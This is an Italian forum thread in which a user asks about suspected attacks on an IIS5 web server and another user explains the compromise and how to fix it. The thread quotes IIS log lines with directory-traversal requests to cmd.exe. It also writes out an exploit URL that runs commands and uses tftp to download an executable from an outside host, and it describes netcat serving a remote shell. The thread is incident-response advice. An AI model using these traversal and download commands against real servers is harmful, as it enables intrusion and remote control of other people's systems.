Attacchi Cracker?

[orson]

Ciao a tutti.
Non so se sono nel forum giusto, ma spero di sì.

Problema:
non so se la mia LAN è stata oggetto di attacchi cracker e vorrei conferme e consigli.

configurazione Lan:
5 PC W2Kpro collegati via HUB, connessione internet ADSL always-on, condivisione connessione internet via W2K, IIS5 per LAN interna, Norton Internet Security (solo da poco, ahimè... vedi oltre).

Situazione:
Qualche giorno fa IIS fa i capricci (il FileSystemObject improvvisamente non funziona più, quando cerco di far eseguire uno script, il browser va in palla e dopo va in palla anche IIS). Vado a vedere il file di Log di IIS e scopro che ci sono stati parecchi accessi al webserver da parte di IP che non dovrebbero esserci.
Vi riporto qualche riga del file di log:

13:57:06 213.48.151.10 GET /scripts/..%5c../winnt/system32/cmd.exe 200
13:57:54 213.48.151.10 GET /scripts/..%5c../winnt/system32/cmd.exe 502
13:59:30 213.48.151.10 GET /scripts/..%5c../winnt/system32/cmd.exe 502
14:00:13 213.48.151.10 GET /scripts/..%5c../winnt/system32/cmd.exe 502
14:00:13 213.48.151.10 GET /scripts/..%5c../Admin.dll 500
14:00:14 213.48.151.10 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
14:00:14 213.48.151.10 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
14:00:15 213.48.151.10 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe 500
14:00:15 213.48.151.10 GET /scripts/..Á../winnt/system32/cmd.exe 500
14:00:15 213.48.151.10 GET /scripts/winnt/system32/cmd.exe 404
14:00:16 213.48.151.10 GET /winnt/system32/cmd.exe 404
14:00:16 213.48.151.10 GET /winnt/system32/cmd.exe 404
14:00:18 213.48.151.10 GET /scripts/..%5c../winnt/system32/cmd.exe 200
14:01:05 213.48.151.10 GET /scripts/..%5c../winnt/system32/cmd.exe 502
14:01:53 213.48.151.10 GET /scripts/..%5c../winnt/system32/cmd.exe 502
14:02:41 213.48.151.10 GET /scripts/..%5c../winnt/system32/cmd.exe 502
14:02:41 213.48.151.10 GET /scripts/..%5c../Admin.dll 500

Se tanto mi dà tanto, non solo ci sono stati attacchi, ma sono anche riusciti (vedi risposta HTTP 200).
Come non bastasse, scopro un utente sulla wwwroot del webserver che non dovrebbe esserci...

Allarmato, istallo Norton Internet Security (andava fatto prima, lo so...) e scopro anche che la mia macchina cerca di collegarsi via TFTP ad uno degli IP che sono entrati.
Verifico se ho dei trojan dentro, ma pare di no.

Configuro il firewall per non fare entrare IP non desiderati, tanto su TCP quanto su UDP.

Conclusioni:
Tentativi di intrusione su web server finiti, però:
1. IIS, disinstallato e reinstallato, continua a non funzionare (FSO niente da fare e server in palla dopo pochi minuti con la motivazione "troppi utenti connessi")
2. continuo a ricevere tanti (ma tanti) tentativi di accesso, giustamente bloccati dal firewall.
Vi riporto uno stralcio del file di log del firewall (tenete conto che solo stamani mattina ha registrato quasi 200 tentatiti di accesso in entrata):

Connessione TCP in entrata
Indirizzo locale, servizio (xxx.xxx.xxx.xxx),8888)
Indirizzo remoto, servizio (61.121.78.159,1800)
Nome processo "N/A"

Connessione TCP in entrata
Indirizzo locale, servizio (xxx.xxx.xxx.xxx),8888)
Indirizzo remoto, servizio (80.134.125.84,4020)
Nome processo "N/A"

Connessione TCP in entrata
Indirizzo locale, servizio (xxx.xxx.xxx.xxx),8888)
Indirizzo remoto, servizio (210.128.222.5,2952)
Nome processo "N/A"

Connessione TCP in entrata
Indirizzo locale, servizio (xxx.xxx.xxx.xxx),sunrpc(111))
Indirizzo remoto, servizio (61.182.255.2,3514)
Nome processo "N/A"

Perdonate se ho nascosto l'IP della mia macchina.

Gli accessi sono principalmente verso la porta 8888 (ma che porta è?), ma non solo.

Domande:
1. sono realmente attacchi o sono paranoico?
2. se sono attacchi, che faccio?? (nel senso, reinstalla tutte le macchine, etc. etc.)

Vi ringrazio per la pazienza di essere arrivati fino in fondo (d'altronde la cosa è piuttosto articolate) e spero possiate darmi qualche consiglio.

Saluti a tutti.

[xdesign]

La parte del LOG che hai riportato riporta effettivamente tentativi di intrusione.

E' stato usato uno scanner per verificare se il tuo IIS consente l'utilizzo di qualche exploit specifico (in questo caso, directory encode e directory decode).

Le risposte "200" indicano allo scanner che quel determinato bug è presente, quindi può essere sfruttato. L'url utilizzata dall'exploit è formata in questo modo:

server.it/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

Nel tuo caso, il bug riguarda solamente la cartella scripts.
Il codice %255c è la rappresentazione esadecimale di %5c che a sua volta lo è del carattere \ (backslash).

Poi, come vedi dal percorso che segue quel codice, viene avviato il prompt di comandi cmd.exe con l'opzione /c, che serve per farlo terminare subito dopo aver eseguito il comando.
Il comando eseguito, in questo caso, è dir c:\ ma nulla vieta di eseguire qualsiasi altro comando.

Una piccola fortuna è che l'aggressore ha accesso solo come utente IUSR_nomepc, quindi solitamente ha delle limitazioni sulle operazioni consentite.

Una grossa sfortuna, invece, è che può avviare il programma tftp sul tuo server come hai avuto modo di notare attraverso il Firewall.
TFTP è simile a FTP, ma usa la porta UDP 69 ed è perfetto per lo scopo primario dell'aggressore: uploadare una backdoor sul tuo server, che potrà essere eseguita attraverso il suo web browser.

Hai fatto bene a controllare l'eventuale presenza di trojan, ma esistono programmi altrettanto pericolosi (per te) e utili (per l'aggressore), che non vengono rilevati come elementi dannosi.
Un esempio è Netcat (solitamente nc.exe o netcat.exe) che, opportunamente configurato, può restituire all'aggressore il tuo prompt di comandi (però, questa volta, con permessi di Amministratore!).

Credo che sia andata proprio così; ti hanno installato netcat sulla porta 8888 per potersi connettere al tuo pc e visualizzare il prompt (con un semplice comando da dos, telnet tuoserver.it 8888 ).

Precisazione: la porta 8888 è attribuita a NewsEDGE server TCP, ma penso che nel tuo caso non c'entra nulla quel programma, l'aggressore ha scelto una porta a caso.

Soluzione

Per prima cosa, vai su http://www.microsoft.com/security oppure su http://windowsupdate.microsoft.com perchè devi installare una Patch di sicurezza relativa al bug.
Il bug si chiama "IIS CGI directory encode" e il relativo bollettino Microsoft di sicurezza dovrebbe essere il MS01-026.
La patch va installata su tutte le macchine che offrono il servizio web con IIS o PWS.

Secondo, devi spulciare i log alla ricerca di un url come questo:

tuoserver.it/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+tftp+-i+12.34.56.78+c:\file.exe+c:\cartella\file.exe

Ti basta anche solo cercare la parola "tftp".
In questo modo, puoi vedere quali files sono stati uploadati sul tuo pc (file.exe) e rimuoverli.


Riguardo al problema di IIS, invece, le cause potrebbero essere molte.
IIS5 installato su Win2000 Pro permette al massimo 10 connessioni contemporanee, quindi se l'aggressore ha molte connessioni al tuo sito potrebbe "saturare" questo limite e provocarti quell'errore.
Il limite massimo di utenti puoi deciderlo da Pannello di controllo > Strumenti di amministrazione > Gestione servizio internet microsoft > > Sito web locale

Clicca con il destro e vai su Proprietà, e nella schermata Sito Web trovi le impostazioni che ti dicevo.

Se non ti servono i CGI, ti consiglio di eliminare definitivamente la cartella Scripts che si trova in c:\inetpub\ oppure almeno di rinominarla.

Scusa per il poema, ma penso di aver risposto a tutte le tue domande

p.s.
Hai fatto bene a nascondere l'IP
Se dopo l'installazione della Patch vuoi che ti controlli la sicurezza del server, contattami pure a roberto@xdesign.it

[orson]

Grazie, xdesign.

Il tuo non è un poema, è un toccasana!
Mi metto subito all'opera e ti faccio sapere, magari contattandoti via e-mail.

Grazie ancora.

[Michi C]

Anche a me han tentato di fare quel che han fatto a te!
Soltanto che io ho un server linux...

bye

[xdesign]

Ok orson, fammi sapere

x Michi C: allora erano proprio esperti

[Michi C]

x xdesign
Già!

Grazie per avermi risposto all'email!

A mio tempo avevo contattato una persona mooolto esperta,e mi aveva detto che quegli attacchi, potevano provenire anche da persone che in realtà venivano usate come "ponte". (avevo controllato con dei whois,e spesso,controllando gli IP da Browser,corrispondevano a sistemi NT,con IIS attivo)
Comunque da me, è tutto tempo perso,come dicevo prima!

bye

[orson]

x Michi C
Ok per Linux (sono dalla tua parte!)
Il problema di Linux è che se non sei esperto nella gestione del sistema, fai più danni della grandine.
Con win, a parole tutti esperti (e poi si pagano le conseguenze...); comunque la si metta, la gestione è effettivamente più semplificata.
Sto cercando di approfondire la conoscenza del Pinguino, ma non è semplice.

xdesign, una cosa ancora:
gli attacchi che ho subito possono aver a che fare con il problema del FSO che non funziona più? Possono aver fatto danni alla scrrun.dll?

Saluti.

[xdesign]

x Michi C

Prego E' vero, una volta preso il controllo di un sistema, lo si può utilizzare come base per ulteriori attacchi, principalmente per nascondere la propria identità.

x orson

Alcuni exploit che probabilmente sono stati tentati hanno danneggiato IIS o suoi componenti. Magari hanno anche eliminato dei files...ti consiglio di reinstallare windows, se ti è possibile.